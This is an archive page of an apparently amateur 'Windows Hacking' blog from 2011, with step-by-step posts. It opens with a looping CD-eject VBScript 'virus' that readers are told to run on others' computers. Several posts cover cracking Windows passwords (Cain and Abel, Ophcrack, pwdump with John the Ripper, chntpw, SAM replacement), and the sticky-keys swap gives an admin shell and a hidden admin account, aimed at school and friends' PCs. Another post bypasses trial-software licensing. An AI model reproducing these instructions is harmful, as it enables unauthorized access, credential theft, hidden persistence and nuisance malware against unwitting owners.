Showing posts with label Windows Hacking. Show all posts
Showing posts with label Windows Hacking. Show all posts

Monday, 26 September 2011

Virus That Will Open And Close Ur Cdrom


Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

copy the above code into notepad and save it as anyname.vbs like virus.vbs
and then double click on it...what u see....bingo

Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process 

BEWARE- Please dont try in your own computer. Try it in others computer.

Set a Video as Desktop Background

Do you want to set a Video as your desktop background instead of wallpaper ?
Its very simple to impress your buddies by doing so... If you want set a video background, just follow this simple steps:-

1. First of all you need a VLC player installed in your OS to perform this task. If not than download the VLC player from internet and install it.

2. Run VLC media player,go to Settings->preferences->Interface->Main interfaces,then click on wxWidgets.Remove the tick on "Taskbar" and put a tick on "Systray icon".

3. Now go to Video ->Output Modules->DirectX.On the bottom right put a tick on advanced options check box.You will now see some options.Put a tick on "Enable Wallpaper Mode ".

4. Now,select playlist and put a check or tick on "Repeat current item ".

5. Press the Save button.Now close the Vlc player and run it again(to save the settings permanently).

6. Now play any video you would like to set as Wallpaper.Right click on the video and click on "Wallpaper".The video would be set as your wallpaper



........................................................................................................................

Friday, 23 September 2011

Hack Administrator's Password Trick!!



Administrator password can be broken by replacing sam file in system32\config by the sam file in repair folder of windows. it can be easily done on a machine with dual operating systems, simply log on to os other then the one whoes password is to be cracked the way is exactly
same as written above but if there is a single os on a machine then there is only one way i.e to use ms dos start up disk or some other boot disk and replace the sam file in config folder with the one in repair folder

note:- this method works only if hard drive is FAT32 formatted because NTFS drive does’nt take boot from Ms DOS

This way you can remove the old administratOr password as if the windows is newly installed and the password was’nt set


.............................................................................................................................................................................................

Sunday, 18 September 2011

Hack Windows passwords with Cain and Abel

In this post i will show you how to crack  local password with cain and abel 

First download cain and abel from "http://www.oxid.it/cain.html" and install it on your system.

Make sure that you have disabled the antivirus/firewall running on your system before installing and throughout this process.

The most effective tecnique  used here is  Brute-Force

 Brute-Force - As this techniques takes more time to complete, the attacker prefer this technique  only when there is a hope that the password contain same type of characters or may be two. i.e only loweralpha, only alpha, only numeric or may be loweralpha-numeric, also it should contain less than 7 characters. Otherwise it takes more time to crack password, which may be the mixture of all types of characters along with special symbols.
The step-by-step explaination for this technique is given below-

1) Open the tool "Cain and Abel"   



2) Go into the category "Cracker"      it displays all sub-categories under "Cracker"

     in    left panel.



3) Select "LM & NTLM Hashes" from left panel and then click on      symbol, you will be greeted by   

    a window as shown.



4) Check "import hashes from local system" and then click "Next". This shows all the active accounts on local system like administrator, guest, etc. along with LM and NT hashed values of their respective passwords, as shown below.



5) Right clicking on any username shows all available options using which we can crack it's password.



6) Here we select "Brute-Force Attack" and then "NTLM Hashes", since windows uses NTLM hashes  

    to store local users' passwords.

7) You will be greeted by a window where you can modify properties for brute-force attack such as 

     password length, character set, etc.



8) Click on "Start" button.

9) On completion it will reveal the exact password.



...................................................................................................................................................

Saturday, 17 September 2011

How To Use Trial Software's For Ever In Windows

One of  my blog readers asked me "How can i use trial version software's forever" .Instead of answering him i taught i can write a tutorial on How to use trial version software's for Ever


Concept :-
When you  install a software for the first time it makes an entry into the Windows Registry with details such as Installed Date and Time, installed path etc.After installation every time you run the software it compares the current system date and time with the installed date and time.So with this it can make out whether the trial period is expired or not. So if we make software think that the trial period is not over we can use the software for ever




How To Use Trial Version Software For Ever

Before we start the Hack Download Crack Lock from Here And follow the steps given below


1. Always note down the date and time, when you install a trial software for the first time.


2. Once the trial period expires, never open it
  
3. Now open Crack Lock which we downloaded earlier and select add program
    
4. Now navigate and select the trial software which you want to use it forever and  Inject  the date of the last day in the trial period.

 Example
 If the trial period expires on December  30 , always inject the date as December 29 
5. Follow the same steps to use any Trail version programs for ever


Note :- Once the trial period of the program expires never open it directly always open the program using crack lock 



....................................................................................................................................................

Friday, 16 September 2011

How To Block Websites Without any Software in Windows Read more: http://hackhaholic.blogspot.com/p/contents_27.html#ixzz1XS4bAv4p

In one of my previous post i told you How to Lock  Folders Without any Software today i will teach you How to Block Websites Manually Without  using any Software

There are many reason why you need to know how to block a website. Some of the most common reasons are you have been targeted by spammers who use adware and popups to attack your PC. Other reasons may be to prevent your children from having access to certain site content such as porn and gambling.



You need not waste money on buying software's to block websites you can use this method to block any website you want 
 
How to Block websites without any Software :-

1. To block websites we need to edit Host file which is usually in C:/Windows/System32/drivers /etc

2. To edit Hosts file open notepad click open and go to  C:/Windows/System32/drivers /etc

3. Open the host.file which looks like image shown below



4. Now enter 127.0.0.1   and  the "website you want block " without quotes 

                                                                                                                              
 

5. You can add all the websites that you want to block  in the same format and finally
    click save  That's it we have successfully blocked  websites by editing the hosts file
   
6. If you find it difficult to do it manually every time  you can make a batch file to block  websites 

Example :-
@echo off
echo 127.0.0.1    www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 127.0.0.1    www.yahoo.com  >> C:\windows\system32\drivers\etc\hosts.txt
exit

7. Copy the above code in a note pad and save it as something.bat .Now once you click
    the the batch file google.com and yahoo.com are blocked you can modify the batch file
    according to your needs

...................................................................................................................................................

Thursday, 15 September 2011

How to hack Windows Password Using Ophcrack

Ever wanted to login to your friends/schools computer  which is password protected or  you’ve lost your Windows password and you've logged out of your computer. If you are in one of these situations you can use Ophcrack to hack/recover your passwords  .In this tutorial i will Explain how to hack windows password using Ophcrack




Things we Need :-

1. Ophcrack Live cd or Flash drive .You can download it from Here 
Note :-If u don't know how to make Ophcrack Live CD /Usb  you can have look at my previous Tutorial from Here   


Procedure :-

1. First plug in your Ophcrack Live cd/usb .Now restart your computer and go to boot menu by  pressing ( f12 or del key ) now select your booting device as CD/USB accordingly

2. Now You will be presented with the Ophcrack LiveCD menu. Leave the default selected and hit enter on your keyboard (or just wait 5 seconds for it to automatically boot).


3. Slax, the version of Linux that is packaged with Ophcrack, will start up




4. Ophcrack will start on its own, and the passwords for each of your Windows users will be cracked and displayed on screen.




5. Write down the passwords, remove the CD from your CD/Usb  and restart your computer. Now you can log in to Windows .

.................................................................................................................................................

Friday, 9 September 2011

Hacking Windows Password Using Chntpw

Sorry  folks for the late Updates.... I had gone to my native place so i was not able to update my blog ..
In this article we will see How to hack windows Password using Chntpw - (Change NT passwords ) utility



Concept :- 

Windows Stores user accounts passwords in a file SAM . Which is located in ( C:/windows/system32/config ) With chntpw  software utility we will be able to reset or blank local passwords used by Windows NT, 2000, XP, Vista, and 7. It does this by editing the SAM database It is included in many security focused Linux distributions such as BackTrack and Knoppix STD.

Things Required :

1. Chntpw utility

I will be using chntpw which is pre-installed in Backtrack 

Procedure :- 

Special thanks to josh for the video
 
.............................................................................................................................

Hack Windows Password Using Pwdump and John The Ripper

I have already written articles on How to hack windows passwords Using various tools such as Ophcrack ,Chntpw and i have also written  an article on how to hack windows password using stick keys . In this article i will explain an another way to Hack/crack windows password using  Pwdump and John the ripper

Hack Windows Password Using Pwdump and John The Ripper 




Things we need :-


1. Pwdump - To dump windows password hashes
2. John the Ripper - To crack the dumped password hashes


Procedure:-


1.  Open My computer and go to C:\Windows\system32 ,now place the Pwdump file which we download earlier

2. Now open command prompt and navigate to C:\Windows\system32 \Pwdump By Using the "cd " command  and  click enter

Example :-
Cd C:\Windows\system32 \Pwdump

3. Now you can see a list of Pwdump commands as shown


4. Now enter pwdump - localhost >>“ destination of the output file “ (for 32-bit computers) and pwdump -x localhost >> “destination of the out put file “(for 64- bit computers )


Example :-
Cd C:\Windows\system32 \Pwdump localhost >> C:\hash.txt (for 32-bit computers )


Cd C:\Windows\system32 \Pwdump -x localhost >> C:\hash.txt (for 64-bit computers)




5. Now open  the Out put  file (In my case its hash.txt )From c:/ you can see the names of the different  users with password hashes Now copy the hashes  corresponding to the admin account

6. Now make JTR (John the ripper ) crackable file by Opening a notepad and pasting the hashes which we copied in the previous step in the format given below
Example:-
User:gyuJo098KkLy9
where "gyuJo098KkLy9" is the  hash which we copied in the 5th step 

7. Save the file as crackme.txt (just an example) and go to the prompt and type 'john crackme.txt' (with out quotes ). Now wait for a while ,the password hashes will be cracked  .You can also use the Various options in John the ripper to make the cracking a little faster .For this you can refer my Tutorial on John the Ripper 


Note : You can also use any other password cracking tool or online password cracking sites like www.cracker.offensive-security.com to crack the hashes 


......................................................................................................................................................

Hack Windows Administrator passwords Using Stick keys

Ever wanted to hack administrator accounts in college/school Pcs . so that you can download with full speed or just wanted to hack your friend’s PC to make him gawk when you tell your success story of hacking ? well there's a great way of hacking Windows administrator password which works 100 % even today......  interested ? read on ......




Concept :
When we Press shift key 5 times a sticky key dialog box shows up.This works even at the logon screen. But If we replace the sethc file  which is responsible for the sticky key dialog box ,with cmd. (command prompt ), and then  press shift key 5 times at logon screen .we will get a command prompt with administrator privileges because no user has logged on. From there we can hack the administrator password or create a new user with admin privileges



Things we Need :-

1. Bootable  Linux distro .In this tutorial i will be using backtrack  If you don't know
    how create a bootable Linux distro you can refer my previous 
    article How To Make a Bootable Backtrack CD / USB


Procedure to Hack windows Administrator passwords Using Stick keys

1. First plug in your Bootable Linux distro CD or USB then restart your computer and 
go to boot menu by  pressing ( f12 or del key ) now select your booting device as CD/USB accordingly


2. After booting with your Linux distro open a new terminal mount the hard disk and navigate to c:/windows/system32 and copy cmd (command prompt) and rename it as sethc


3. Now copy /past the new sethc to c:/windows/system32,when asks for overwriting the file click yes.

4. Now reboot and remove your usb/cd . Now when your in the logon screen press shift key 5 times Instead of Sticky Key confirmation dialog box ,command prompt with full administrator privileges will open.




5. Now you can change the password of the administrator account or add a new user using the following commands

Example :
"Net user administrator 123 " where 123 is the password  or  you can add a new user 
"Net user  hackaholic /add "  where hackaholic is the name of the user  


6. You can also hide the  newly created account by going  to registry editor by click run and entering regedit  


Now  navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList]Here create a new DWORD value, write its name as the “user name” that you created for your  account  

By  this way we are able to hack windows admin accounts successfully .I hope you liked the post if you have any doubts please be free to comment
..........................................................................................................................................................